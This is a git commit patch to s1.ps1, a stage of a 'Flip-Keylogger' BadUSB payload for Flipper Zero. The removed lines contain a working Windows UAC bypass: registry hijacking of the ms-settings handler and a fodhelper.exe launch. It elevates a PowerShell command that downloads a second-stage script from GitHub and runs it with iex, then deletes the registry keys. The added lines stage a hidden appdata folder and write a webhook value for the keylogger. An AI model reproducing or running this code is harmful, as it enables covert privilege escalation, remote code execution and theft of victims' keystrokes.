From 477b87d856b6bbf0eea367a1e485d5f86b05a202 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 23 Dec 2022 12:47:21 -0600 Subject: [PATCH] Update s1.ps1 --- Payloads/Flip-Keylogger/s1.ps1 | 18 ++---------------- 1 file changed, 2 insertions(+), 16 deletions(-) diff --git a/Payloads/Flip-Keylogger/s1.ps1 b/Payloads/Flip-Keylogger/s1.ps1 index c945fee..ae9b4c6 100644 --- a/Payloads/Flip-Keylogger/s1.ps1 +++ b/Payloads/Flip-Keylogger/s1.ps1 @@ -1,16 +1,2 @@ -function s1 { - $user = "$env:COMPUTERNAME\$env:USERNAME" - $isAdmin = (Get-LocalGroupMember 'Administrators').Name -contains $user -if($isAdmin){ - $259="powershell.exe -noexit iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/s2.ps1 | iex"; - reg add "HKCU\Software\Classes\.259\Shell\Open\command" /d $259 /f;reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".259" /f;fodhelper.exe;Start-Sleep -s 3;reg delete "HKCU\Software\Classes\.259\" /f;reg delete "HKCU\Software\Classes\ms-settings\" /f; - - } - else{ - Break - } -} - -if (![System.IO.Directory]::Exists("$env:appdata\-locker")){New-Item -ItemType Directory -Force -Path "$env:appdata\-locker"};echo $dc > "$env:appdata\-locker\wh.txt"; - -s1 +if (![System.IO.Directory]::Exists("$env:appdata\-locker")){New-Item -ItemType Directory -Force -Path "$env:appdata\-locker"}; +echo $dc > "$env:appdata\-locker\wh.txt";